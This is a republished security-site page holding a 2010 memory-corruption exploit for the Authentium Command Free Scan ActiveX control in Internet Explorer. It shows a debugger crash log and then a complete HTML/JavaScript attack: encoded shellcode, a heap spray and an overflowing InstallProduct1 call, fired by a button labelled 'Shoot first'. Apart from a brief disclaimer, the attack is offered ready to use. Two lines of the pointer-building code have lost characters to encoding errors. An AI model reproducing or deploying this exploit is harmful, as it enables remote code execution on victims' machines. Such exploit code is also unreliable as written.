首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Authentium Command Free Scan ActiveX Control Memory corruption Exploit
来源:nso-research[at]sotiriu.de 作者:Sotiriu 发布时间:2010-03-08  

<html>
<body>
<pre>
<img src="http://sotiriu.de/images/logo_wh_80.png"><br>
<h2>Authentium Command Free Scan ActiveX Control Memory corruption Exploit</h2>
Author:   Nikolas Sotiriu (lofi)
Advisory: http://www.sotiriu.de/adv/NSOADV-2010-xxx.txt

Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.

<input language=JavaScript onclick=shoot() type=button value="Rule#5 Shoot first"><br>

<h3>ActiveX Control Informations:</h3>
Name:   CSS Web Installer Class
Prog ID:  CSSWEBLib.Installer
Vendor:   Authentium, Inc.
Type:              ActiveX-Control
Version:           1.4.9508.605
GUID:              {6CCE3920-3183-4B3D-808A-B12EB769DE12}
File:              cssweb.dll
Folder:   C:\WINDOWS\Downloaded Program Files\
Safe for Script:  True
Safe for Init:   True
IObjectSafety:   False

<h3>Test Informations:</h3>
- Windows XP SP3 IE7 Ger

<h3>M$ Exploitablitiy Informations</h3>

(158.968): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7efefefe ebx=02695140 ecx=02695180 edx=41414141 esi=02695140 edi=42424242
eip=1000c1a9 esp=0194b414 ebp=0194b4e0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\Downloaded Program Files\cssweb.dll -
cssweb!DllUnregisterServer+0x37a3:
1000c1a9 8917            mov     dword ptr [edi],edx  ds:0023:42424242=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:005> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x42424242
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0x223e0447.0x22676030

Stack Trace:
cssweb!DllUnregisterServer+0x37a3
cssweb!DllUnregisterServer+0x22d8
mshtml!CFontCache::GetBaseCcs+0x1bd
mshtml!CStr::Set+0x1b
mshtml!COneRun::Clone+0x87
Instruction Address: 0x000000001000c1a9

Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at cssweb!DllUnregisterServer+0x00000000000037a3 (Hash=0x223e0447.0x22676030)

User mode write access violations that are not near NULL are exploitable.


</pre>
<object classid='clsid:6CCE3920-3183-4B3D-808A-B12EB769DE12' id='obj'></object>

<script language='javascript'>

 shellcode = unescape(
   '%ub0ba%u8813%udbda%ud9d5%u2474%u5ef4%uc933%u33b1'+
   '%u5631%u8312%ufcee%ue603%u6a1d%ufa2f%ue3ca%u02d0'+
   '%u940b%ue759%u863a%u6c3e%u166e%u2034%udd83%ud018'+
   '%u9310%ud7b4%u1e91%ud6e3%uaf22%ub42b%ub1e1%uc6d7'+
   '%u1235%u09e9%u5348%u772e%u01a3%ufce7%ub616%u408c'+
   '%ub7ab%ucf42%ucf93%u0fe7%u7a67%u5fe9%uf1d8%u47a1'+
   '%u5d52%u7612%ubdb7%u316e%u76bc%uc004%u4714%uf3e5'+
   '%u0458%u3cd8%u5455%ufa1c%u2386%uf956%u343b%u80ad'+
   '%ub1e7%u2230%u6163%ud391%uf4a0%udf52%u720d%uc33c'+
   '%u5790%uff36%u5619%u7699%u7d59%ud33d%u1c39%ub964'+
   '%u21ec%u6576%u8450%u87fc%ube85%ucd5e%u3258%ua8e5'+
   '%u4c5b%u9ae6%u7d33%u756d%u8243%u32a4%u73b5%uae75'+
   '%u2a22%u93ec%ucd2e%ud7da%u4e56%ua7ef%u4eac%ua29a'+
   '%uc8e9%ude76%ubd62%u4d78%u9482%u101a%u7410%ub7f3'+
   '%u1f90%u410b');


 nops=unescape('%u9090%u9090');
 headersize =20;
 
 slackspace= headersize + shellcode.length;
     
     //Filling the header
 while(nops.length< slackspace) nops+= nops;
  fillblock= nops.substring(0, slackspace);
  block= nops.substring(0, nops.length- slackspace);
     
 while( block.length+ slackspace<0x30000) block= block+ block+ fillblock;
    
 //Creating the array.
 memory=new Array();
     
 //Filling the array with the nops + shellcode.
 for( counter=0; counter<300; counter++) memory[counter]= block + shellcode;

 //This is our RET
 edx=unescape('%08%08%08%08');

 ret='';
 //Junk
 for( counter=0; counter<=2075; counter++) ret+=unescape('%42');

 //Build the pointer to our overwritten RET
 //I know this looks strange but it was the only way i found to overcome
        //the badchar problem (0x8E=>bad 0x94=>bad)
 ret+=unescape('%18');
 ret+="?; //%8E must be given in as unicode sign (beware of you editor)
 ret+="?; //%95 must be given in as unicode sign (beware of you editor)
 ret+=unescape('%01');
 //Pointer is => 0x01948e18 from cssweb.dll

function shoot()
 {
 obj.InstallProduct1(edx,ret)

 }

</script>
</body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sagem Routers remote authentic
·Yahoo Player 1.0 (.m3u) Local
·BigForum Version 4.5 SQL Injec
·WebKit Style Tag Remote Denial
·Sagem Routers Remote Auth bypa
·Namoroka 3.6 Alpha 1 Remote Me
·Sagem Routers Remote Reset Exp
·Kolang (proc_open PHP safe mod
·WinSmMuPl 1.2.5 (.mp3) Local C
·ONECMS v2.5 SQL Injection Vuln
·AKoff MIDI Player v1.00 Buffer
·Flare <= 0.6 Local Heap Overfl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved